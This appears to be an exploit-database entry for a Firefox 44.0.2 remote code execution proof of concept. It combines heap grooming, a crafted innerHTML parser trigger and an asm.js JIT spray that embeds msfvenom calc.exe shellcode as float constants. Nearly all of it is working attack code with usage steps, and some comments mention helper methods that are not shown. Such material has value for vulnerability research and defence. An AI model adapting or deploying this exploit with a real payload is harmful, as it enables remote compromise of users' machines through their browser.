Exploits / Vulnerability Discovered : 2018-03-16 |
Type : remote |
Platform : windows
This exploit / vulnerability (Firefox 44.0.2 asm.js JIT-spray remote code execution) is published for educational purposes only; if you use it, you do so at your own risk.
[+] Code ...
<!DOCTYPE HTML>
<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
*PoC* exploit against Firefox 44.0.2 (CVE-2016-1960, the bug this PoC triggers; the JIT spray supplies the payload)
asm.js float-constant-pool JIT-spray variant, as shown at OffensiveCon 2018
Tested on:
Firefox 44.0.2 32-bit - Windows 10 1709
https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe
Howto:
1) serve the PoC over the network and open it in Firefox 44.0.2 32-bit — do this only in an isolated, disposable VM: a successful run executes the embedded shellcode inside the browser process
2) A successful exploit attempt should pop calc.exe
Mozilla Bug Report:
https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
Notes:
*) very similar to CVE-2016-2819, but still different:
*) this PoC (CVE-2016-1960) triggers in 44.0.2 but not in 46.0.1,
because it is already fixed in 46.0.1.
*) CVE-2016-2819 triggers the same bug in both 44.0.2 and 46.0.1, because
that variant was fixed only in Firefox versions later than 46.0.1.
/**
 * Groom the heap and then trigger the CVE-2016-1960 bug (Mozilla bug
 * 1246014, see the header comment).
 *
 * Statement order is exploit-critical (it determines the heap layout), so do
 * not reorder. The body is replaced with a minimal table/svg/div skeleton,
 * this.heap.gc() is called (a Heap method not visible in this excerpt), and
 * then 0x11000 Uint32Arrays of 0x100 bytes are allocated, every slot holding
 * node_ptr. Per the original inline comment, the intent is that the parser's
 * mis-indexed element access (the "integer underflow") lands on this sprayed
 * data and reads node_ptr as a Node object pointer; whether 0x100 bytes and
 * 0x11000 copies match the vulnerable allocation is not derivable from this
 * code. The innerHTML assignment on the AAAA div is the trigger markup; the
 * final reload restarts the page, presumably to retry — TODO confirm against
 * the load handler outside this excerpt.
 *
 * @param {number} node_ptr - 32-bit value written into every sprayed slot; it
 *   is what the parser is expected to pick up as a Node pointer.
 * @returns {undefined}
 */
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = '<table><svg><div id="AAAA">'
this.heap.gc()
var a = new Array()
for (var i=0; i < 0x11000; i++){
/* array element (Node object ptr) control with integer underflow */
a[i] = new Uint32Array(0x100/4)
for (var j=0; j<0x100/4; j++)
a[i][j] = node_ptr
}
/* original crashing testcase
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
*/
/* easier to exploit codepath */
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
window.location.reload()
};
/** Holder for the asm.js JIT-spray helpers; carries no instance state of its own. */
var Asmjs = function Asmjs() {};
/**
 * asm.js module that exists only for its float constant pool. When the module
 * is compiled, the 24 double literals passed to foo() are emitted as raw 8-byte
 * IEEE-754 values in the JIT's constant pool (24 * 8 = 0xc0 bytes, matching the
 * size noted below), so the bytes of the calc.exe shellcode (msfvenom
 * windows/exec CMD=calc.exe, converted to doubles by sc2asmjs.py) land in
 * JIT memory. This is the CVE-2017-5375 asm.js JIT-spray primitive named in
 * the header comment. payload() need not ever run as JavaScript; the module
 * is compiled once per region (see spray_float_payload) and, presumably,
 * control is later redirected into the pool — the low 16 bits of its address
 * (0x1dc8) are given as fixed for Firefox 44.0.2 in the comment below, while
 * the redirect itself is outside this excerpt.
 *
 * asm.js validation is strict: "use asm" must stay the first statement,
 * `var foo = ffi.foo` is the FFI import, and the +/0.0 double annotations must
 * remain. Do not reformat or "modernize" this function — the constant values
 * and their order ARE the payload.
 *
 * @param {object} stdlib - asm.js standard-library object (window at the call site)
 * @param {object} ffi - foreign-function table; must provide `foo`
 * @returns {function} the exported payload function
 */
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
"use asm"
var foo = ffi.foo
function payload(){
var val = 0.0
/* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
val = +foo(
// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
-1.587865768352248e-263,
-8.692422460804815e-255,
7.529882109376901e-114,
2.0120602207293977e-16,
3.7204662687249914e-242,
4.351158092040946e+89,
2.284741716118451e+270,
7.620699014501263e-153,
5.996021286047645e+44,
-5.981935902612295e-92,
6.23540918304361e+259,
1.9227873281657598e+256,
2.0672493951546363e+187,
-6.971032919585734e+91,
5.651413300798281e-134,
-1.9040061366251406e+305,
-1.2687640718807038e-241,
9.697849844423e-310,
-2.0571400761625145e+306,
-1.1777948610587587e-123,
2.708909852013898e+289,
3.591750823735296e+37,
-1.7960516725035723e+106,
6.326776523166028e+180
)
return +val;
}
return payload
};
/**
 * Compile `regions` independent copies of the asm.js module so that its float
 * constant pool (the shellcode) is emitted once per compiled region. `window`
 * is passed as the asm.js stdlib and `foo` is stubbed to return 0; the
 * compiled payload functions are kept in this.modules. What is done with them
 * afterwards is outside this excerpt.
 *
 * @param {number} regions - number of module copies to compile; an invalid
 *   array length (negative, non-integer) throws RangeError as before.
 * @returns {undefined}
 */
Asmjs.prototype.spray_float_payload = function (regions) {
  var slots = new Array(regions).fill(null);
  var compiled = [];
  for (var idx = 0; idx < slots.length; idx++) {
    compiled.push(this.asm_js_module(window, { foo: () => 0 }));
  }
  this.modules = compiled;
};
/**
 * Heap-grooming helper. The constructor only initialises node_heap; the
 * target_addr and eip arguments are accepted but not stored here — they are
 * presumably consumed by prototype methods outside this excerpt.
 *
 * @param {number} target_addr - accepted, unused by the constructor
 * @param {number} eip - accepted, unused by the constructor
 */
var Heap = function Heap(target_addr, eip) {
  this.node_heap = [];
};